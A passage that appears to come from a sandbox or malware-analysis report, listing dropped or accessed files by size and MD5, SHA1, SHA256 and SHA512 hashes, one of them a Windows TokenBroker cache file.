  MD5: aff314423d9f45f13bc7a0bcfdcac8f6
  SHA1: 96c1e42dbc8e527f0d83e73f1f57fc845a62af97
  SHA256: 31f45896870cda78e4a644e6e7321f6f3f5d2f47193a7244519abd55cea827cc
  SHA512: 57ca272811f545573e62f5bb736236466ffc55dc8b534b48feb00edc766ac959bc8868506c46a3813aa19a81601d39dd4c8289fb4ee96573483ec4638b79ffc3
- Filesize: 7KB
  MD5: ee66586efd247bd302d6ad493d564eb0
  SHA1: 63dcdc386a46478f668229bf7475ff9a430c4491
  SHA256: 6bfc1ae4bcbbfd34e39deabc6e20fc2d5c0c83556f7bfbc7f51134cf5d5bb725
  SHA512: 974189167136e3077eb014232bca6b449b079dbb86aa6dca6443c5765f59a5a46c89f31dc7d0c7e0b3b9620866a9240c84dcb7d6f0ce53090eb6ee1b5cbab717
- C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
  Filesize: 2KB
  MD5: 1a6ddfa543c440a859a51adf665365fa
  SHA1: 4becb8a63efceace76207572984b7e340c28fc54
  SHA256: 41803f3dbca5bbea6f8987d64e9375d5a231917682e6668aeaae540d61ab4fb2
  SHA512: d372138ba0f46f5bf0cd720efc69ab1d50c047b9edefdde59471b14ae1360c91e381374cc6f6d53fa10614a012cdee4bd8fc45b8e7f7a00fb135fba0190f9a84
- Filesize: 64B
  MD5: 2b5631c2923d86fc9a026dd9cfe44187
  SHA1: bea53b84a25af630b61436269947d635050faffd
  SHA256: 3cf795c0745b1f062b1f4da926c6dbfb9e74d61e49f63ca142bb343cf2941ba5
  SHA512: 808099a48f70c2dff24dc05098285c8d4de2bceb3d8521dfb5258dfd0430f42eec5cd2d02eb4268a7db2a07518efcdbaea5e5f402dc1afb9feb826c56893669b
- Filesize: 1KB
  MD5: 6fab1e187ad4914b81eb556f57680330
  SHA1: 4c2e5c80c9193bdc108dd44042e5c1de3723129c
  SHA256: c64a8d84b6a4c3b87766cac00b313c473fd10af79b88340a0ebe36e273e92ec2
  SHA512: 1eb837c2f0521aa8703b5a0a6238de3851ca4e36842d853672a6d8fb4c76c62b443ee757265612d3464d733e6c635a51b5a42f8b17a6c106119fa2e8d5478919
- Filesize: 47KB
  MD5: ee9bd2b3d64511b880fcbd8ad23c71fa
  SHA1: 8c2cc8c959621c4543c9aa111367adb77f1ec697
  SHA256: 040ef285cdbca1ab4b3ceaeac8f0ace87aca7d2147123a1359f27a3039b0b700
  SHA512: 47c90a3a2093796a8b324fd76f92bc6f5a3975272f88305352d3e9c4fcd543f2c2421d7ed0d95e9df0cda33e6fb58b2a10c3a400bdeb6c1cb4912d50970623ec
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 160B
  MD5: 545767c55eed247ab32fab4ada992cd6
  SHA1: b60523405d39d3f24a0c50ceb16141a6c718b649
  SHA256: 00ecd01181a2220ae8b4a56be3d6ad9bdcf52a24486905fc90c877b494b26d59
  SHA512: 541b5b529492575af4d1902c19e38e664e823189d65239ea66c442285cac07aecaa96154a5a96bcfda493ea66bcf3557d2986f4230af33f8faf25166246e14a2
- Filesize: 1KB
  MD5: 1cad2cafba69dfd93fd369cac5d7f332
  SHA1: 1d5b120a9cf6c14c6539bb482c0d31eb39a59216
  SHA256: e91cb124ad396e993ce57407e3759efd9c4a577c5c6c0bcdf7c26a5bbe58a861
  SHA512: fb422bb50bc318b505e53cb3db6009b6a665e09dd259b9f7c086f9137838136e1e5724cbaed92d6adb018523a3196f873f331b9dd5b0fcf2f253c85d491703e1